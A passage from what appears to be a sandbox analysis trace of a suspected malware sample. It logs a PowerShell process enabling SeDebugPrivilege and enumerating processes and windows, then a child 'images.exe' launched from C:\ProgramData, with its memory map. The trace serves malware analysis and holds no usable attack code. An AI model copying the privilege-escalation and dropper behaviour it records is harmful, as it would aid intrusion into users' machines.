lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87 [0305.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xde704, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87 [0305.253] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xdeb64) returned 1 [0305.253] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.management.automation\\v4.0_3.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xdebe0 | out: lpFileInformation=0xdebe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2c94e9, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2c94e9, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2ef73f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6d2a00)) returned 1 [0305.254] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xdeb60) returned 1 [0305.259] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xdec54 | out: lpdwHandle=0xdec54) returned 0x93c [0306.253] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x93c, lpData=0x62a8f5c | out: lpData=0x62a8f5c) returned 1 [0306.254] VerQueryValueW (in: pBlock=0x62a8f5c, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xdec28, puLen=0xdec24 | out: lplpBuffer=0xdec28*=0x62a8ff8, puLen=0xdec24) returned 1 [0306.258] VerQueryValueW (in: pBlock=0x62a8f5c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xdeba8, puLen=0xdeba4 | out: lplpBuffer=0xdeba8*=0x62a90d4, puLen=0xdeba4) returned 1 [0306.258] VerQueryValueW (in: pBlock=0x62a8f5c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xdeba8, puLen=0xdeba4 | out: lplpBuffer=0xdeba8*=0x62a9128, puLen=0xdeba4) returned 1 [0306.258] VerQueryValueW (in: pBlock=0x62a8f5c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xdeba8, puLen=0xdeba4 | out: lplpBuffer=0xdeba8*=0x62a9184, puLen=0xdeba4) returned 1 [0306.258] VerQueryValueW (in: pBlock=0x62a8f5c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xdeba8, puLen=0xdeba4 | out: lplpBuffer=0xdeba8*=0x62a91c0, puLen=0xdeba4) returned 1 [0306.258] VerQueryValueW (in: pBlock=0x62a8f5c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xdeba8, puLen=0xdeba4 | out: lplpBuffer=0xdeba8*=0x62a9228, puLen=0xdeba4) returned 1 [0306.258] VerQueryValueW (in: pBlock=0x62a8f5c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xdeba8, puLen=0xdeba4 | out: lplpBuffer=0xdeba8*=0x62a92c4, puLen=0xdeba4) returned 1 [0306.258] VerQueryValueW (in: pBlock=0x62a8f5c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xdeba8, puLen=0xdeba4 | out: lplpBuffer=0xdeba8*=0x62a9328, puLen=0xdeba4) returned 1 [0306.258] VerQueryValueW (in: pBlock=0x62a8f5c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xdeba8, puLen=0xdeba4 | out: lplpBuffer=0xdeba8*=0x62a93a4, puLen=0xdeba4) returned 1 [0306.258] VerQueryValueW (in: pBlock=0x62a8f5c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xdeba8, puLen=0xdeba4 | out: lplpBuffer=0xdeba8*=0x62a9050, puLen=0xdeba4) returned 1 [0306.258] VerQueryValueW (in: pBlock=0x62a8f5c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xdeba8, puLen=0xdeba4 | out: lplpBuffer=0xdeba8*=0x0, puLen=0xdeba4) returned 0 [0306.258] VerQueryValueW (in: pBlock=0x62a8f5c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xdeba8, puLen=0xdeba4 | out: lplpBuffer=0xdeba8*=0x0, puLen=0xdeba4) returned 0 [0306.258] VerQueryValueW (in: pBlock=0x62a8f5c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xdeba8, puLen=0xdeba4 | out: lplpBuffer=0xdeba8*=0x0, puLen=0xdeba4) returned 0 [0306.258] VerQueryValueW (in: pBlock=0x62a8f5c, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xdeb9c, puLen=0xdeb98 | out: lplpBuffer=0xdeb9c*=0x62a8ff8, puLen=0xdeb98) returned 1 [0306.259] VerLanguageNameW (in: wLang=0x0, szLang=0xde92c, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0306.389] VerQueryValueW (in: pBlock=0x62a8f5c, lpSubBlock="\\", lplpBuffer=0xdebac, puLen=0xdeba8 | out: lplpBuffer=0xdebac*=0x62a8f84, puLen=0xdeba8) returned 1 [0306.662] GetCurrentProcessId () returned 0xfb0 [0306.674] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xde47c | out: lpLuid=0xde47c*(LowPart=0x14, HighPart=0)) returned 1 [0306.675] GetCurrentProcess () returned 0xffffffff [0306.675] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0xde478 | out: TokenHandle=0xde478*=0x28c) returned 1 [0306.676] AdjustTokenPrivileges (in: TokenHandle=0x28c, DisableAllPrivileges=0, NewState=0x62ab450*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0306.676] CloseHandle (hObject=0x28c) returned 1 [0306.678] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xfb0) returned 0x28c [0306.687] EnumProcessModules (in: hProcess=0x28c, lphModule=0x62ab494, cb=0x100, lpcbNeeded=0xdebdc | out: lphModule=0x62ab494, lpcbNeeded=0xdebdc) returned 1 [0306.688] GetModuleInformation (in: hProcess=0x28c, hModule=0xe20000, lpmodinfo=0x62ab5d4, cb=0xc | out: lpmodinfo=0x62ab5d4*(lpBaseOfDll=0xe20000, SizeOfImage=0x71000, EntryPoint=0xe29c00)) returned 1 [0306.689] CoTaskMemAlloc (cb=0x804) returned 0x518948 [0306.689] GetModuleBaseNameW (in: hProcess=0x28c, hModule=0xe20000, lpBaseName=0x518948, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0306.690] CoTaskMemFree (pv=0x518948) [0306.690] CoTaskMemAlloc (cb=0x804) returned 0x518948 [0306.690] GetModuleFileNameExW (in: hProcess=0x28c, hModule=0xe20000, lpFilename=0x518948, nSize=0x800 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0306.690] CoTaskMemFree (pv=0x518948) [0306.691] CloseHandle (hObject=0x28c) returned 1 [0306.691] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xfb0) returned 0x28c [0306.691] GetExitCodeProcess (in: hProcess=0x28c, lpExitCode=0x62aab9c | out: lpExitCode=0x62aab9c*=0x103) returned 1 [0306.830] EnumWindows (lpEnumFunc=0xdd27b6, lParam=0x0) returned 1 [0306.833] GetWindowThreadProcessId (in: hWnd=0x1014c, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x944 [0306.834] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x8f4 [0306.834] GetWindowThreadProcessId (in: hWnd=0x100e0, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x85c [0306.834] GetWindowThreadProcessId (in: hWnd=0x100ba, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x85c [0306.834] GetWindowThreadProcessId (in: hWnd=0x100be, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x85c [0306.834] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x85c [0306.834] GetWindowThreadProcessId (in: hWnd=0x100d4, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x85c [0306.834] GetWindowThreadProcessId (in: hWnd=0x100d8, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x85c [0306.835] GetWindowThreadProcessId (in: hWnd=0x100a0, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x85c [0306.835] GetWindowThreadProcessId (in: hWnd=0x100ae, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x85c [0306.835] GetWindowThreadProcessId (in: hWnd=0x100d2, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x85c [0306.835] GetWindowThreadProcessId (in: hWnd=0x10094, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x85c [0306.835] GetWindowThreadProcessId (in: hWnd=0x101e2, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x4ec [0306.835] GetWindowThreadProcessId (in: hWnd=0x100ec, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x7d0 [0306.835] GetWindowThreadProcessId (in: hWnd=0x100e2, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x85c [0306.836] GetWindowThreadProcessId (in: hWnd=0x20128, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x2d0 [0306.836] GetWindowThreadProcessId (in: hWnd=0x501b0, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0xfb4 [0306.836] GetWindow (hWnd=0x501b0, uCmd=0x4) returned 0x0 [0306.837] IsWindowVisible (hWnd=0x501b0) returned 0 [0306.837] GetWindowThreadProcessId (in: hWnd=0x101dc, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x4ec [0306.837] GetWindowThreadProcessId (in: hWnd=0x101da, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x554 [0306.837] GetWindowThreadProcessId (in: hWnd=0x101d6, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x554 [0306.837] GetWindowThreadProcessId (in: hWnd=0x101c6, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x4ec [0306.837] GetWindowThreadProcessId (in: hWnd=0x101c0, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x85c [0306.837] GetWindowThreadProcessId (in: hWnd=0x20072, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x744 [0306.837] GetWindowThreadProcessId (in: hWnd=0x20076, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x744 [0306.838] GetWindowThreadProcessId (in: hWnd=0x40070, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x85c [0306.838] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x998 [0306.838] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x8f4 [0306.838] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x8f4 [0306.838] GetWindowThreadProcessId (in: hWnd=0x30176, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x8f4 [0306.838] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x8f4 [0306.838] GetWindowThreadProcessId (in: hWnd=0x10136, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x8f4 [0306.839] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x8f4 [0306.839] GetWindowThreadProcessId (in: hWnd=0x1010e, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x8f4 [0306.839] GetWindowThreadProcessId (in: hWnd=0x1010a, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x8f4 [0306.839] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x8f4 [0306.839] GetWindowThreadProcessId (in: hWnd=0x10100, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x7d0 [0306.839] GetWindowThreadProcessId (in: hWnd=0x100f8, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x7d0 [0306.839] GetWindowThreadProcessId (in: hWnd=0x200f0, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x884 [0306.840] GetWindowThreadProcessId (in: hWnd=0x100d6, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x85c [0306.840] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x554 [0306.840] GetWindowThreadProcessId (in: hWnd=0x20050, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x4ec [0306.840] GetWindowThreadProcessId (in: hWnd=0x101e0, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x4ec [0306.840] GetWindowThreadProcessId (in: hWnd=0x100c2, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x85c [0306.840] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x7d0 [0306.840] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x7d0 [0306.841] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x48c [0306.841] GetWindowThreadProcessId (in: hWnd=0x1001c, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x324 [0306.841] GetWindowThreadProcessId (in: hWnd=0x100fe, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x8c4 [0306.841] GetWindowThreadProcessId (in: hWnd=0x100e6, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x7d0 [0306.841] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x944 [0306.841] GetWindowThreadProcessId (in: hWnd=0x100e4, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x85c [0306.841] GetWindowThreadProcessId (in: hWnd=0x10096, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x85c [0306.841] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0xd30 [0306.842] GetWindowThreadProcessId (in: hWnd=0x4004c, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0xfd4 [0306.842] GetWindowThreadProcessId (in: hWnd=0x101d8, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x554 [0306.842] GetWindowThreadProcessId (in: hWnd=0x101c8, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x4ec [0306.842] GetWindowThreadProcessId (in: hWnd=0x20074, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x744 [0306.842] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x998 [0306.842] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x8f4 [0306.842] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x7d0 [0306.843] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x884 [0306.843] GetWindowThreadProcessId (in: hWnd=0x10086, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x7d0 [0306.843] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x48c [0306.851] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x72a94b0, Length=0x20000, ResultLength=0xdec14 | out: SystemInformation=0x72a94b0, ResultLength=0xdec14*=0xf2b8) returned 0x0 [0306.964] WerSetFlags () returned 0x0 [0306.971] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1 [0307.357] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xdec30, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xdec2c | out: pulNumLanguages=0xdec30, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xdec2c) returned 1 [0307.357] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xdec30, pwszLanguagesBuffer=0x62c73e0, pcchLanguagesBuffer=0xdec2c | out: pulNumLanguages=0xdec30, pwszLanguagesBuffer=0x62c73e0, pcchLanguagesBuffer=0xdec2c) returned 1 [0307.368] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd6e8 | out: phkResult=0xdd6e8*=0x0) returned 0x2 [0307.376] GetUserDefaultLocaleName (in: lpLocaleName=0xdebc0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6 [0307.675] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xde390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0307.679] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xde390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0309.905] CoCreateGuid (in: pguid=0xde2cc | out: pguid=0xde2cc*(Data1=0x72330975, Data2=0x4fa0, Data3=0x4d88, Data4=([0]=0x95, [1]=0x8c, [2]=0x41, [3]=0xae, [4]=0x86, [5]=0xca, [6]=0xb2, [7]=0xee))) returned 0x0 [0310.179] EtwEventRegister (in: ProviderId=0x62df02c, EnableCallback=0xdd27de, CallbackContext=0x0, RegHandle=0x62df008 | out: RegHandle=0x62df008) returned 0x0 [0310.179] EtwEventSetInformation (RegHandle=0x513d48, InformationClass=0x24, EventInformation=0x2, InformationLength=0x62defbc) returned 0x0 Thread: id = 67 os_tid = 0xfd8 Thread: id = 68 os_tid = 0xfdc Thread: id = 69 os_tid = 0xfe0 [0295.979] CoGetContextToken (in: pToken=0xa9fc3c | out: pToken=0xa9fc3c) returned 0x0 [0295.979] CObjectContext::QueryInterface () returned 0x0 [0295.979] CObjectContext::GetCurrentThreadType () returned 0x0 [0295.979] Release () returned 0x0 [0295.979] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0295.979] RoInitialize () returned 0x1 [0295.979] RoUninitialize () returned 0x0 Thread: id = 88 os_tid = 0xca0 Process: id = "16" image_name = "images.exe" filename = "c:\\programdata\\images.exe" page_root = "0xfc95000" os_pid = "0xfb8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "14" os_parent_pid = "0xfa0" cmd_line = "\"C:\\ProgramData\\images.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00015c7b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1922 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1923 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1924 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1925 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1926 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1927 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1928 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1929 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1930 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1931 start_va = 0x400000 end_va = 0x555fff monitored = 1 entry_point = 0x553b50 region_type = mapped_file name = "images.exe" filename = "\\ProgramData\\images.exe" (normalized: "c:\\programdata\\images.exe") Region: id = 1932 start_va = 0x77760000 end_va = 0x778dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1933 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1934 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1935 start_va = 0x7fff0000 end_va = 0x7ff85d0cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1936 start_va = 0x7ff85d0d0000 end_va = 0x7ff85d290fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1937 start_va = 0x7ff85d291000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff85d291000" filename = "" Region: id = 1943 start_va = 0x640000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 1944 start_va = 0x68240000 end_va = 0x6828ffff monitored = 0 entry_point = 0x68258180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1945 start_va = 0x682a0000 end_va = 0x68319fff monitored = 0 entry_point = 0x682b3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1946 start_va = 0x74c90000 end_va = 0x74d6ffff monitored = 0 entry_point = 0x74ca3980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1947 start_va = 0x68290000 end_va = 0x68297fff monitored = 0 entry_point = 0x682917c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1948 start_va = 0x650000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 1949 start_va = 0x74c90000 end_va = 0x74d6ffff monitored = 0 entry_point = 0x74ca3980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1950 start_va = 0x75ac0000 end_va = 0x75c3dfff monitored = 0 entry_point = 0x75b71b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1951 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1952 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1973 start_va = 0x560000 end_va = 0x61dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1974 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1975 start_va = 0x75830000 end_va = 0x758aafff monitored = 0 entry_point = 0x7584e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1976 start_va = 0x74570000 end_va = 0x7462dfff monitored = 0 entry_point = 0x745a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1977 start_va = 0x750000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 1978 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1979 start_va = 0x75680000 end_va = 0x756c3fff monitored = 0 entry_point = 0x75699d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1980 start_va = 0x753a0000 end_va = 0x7544cfff monitored = 0 entry_point = 0x753b4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1981 start_va = 0x74490000 end_va = 0x744adfff monitored = 0 entry_point = 0x7449b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1982 start_va = 0x74480000 end_va = 0x74489fff monitored = 0 entry_point = 0x74482a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1983 start_va = 0x75580000 end_va = 0x755d7fff monitored = 0 entry_point = 0x755c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1984 start_va = 0x749b0000 end_va = 0x74afefff monitored = 0 entry_point = 0x74a66820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: 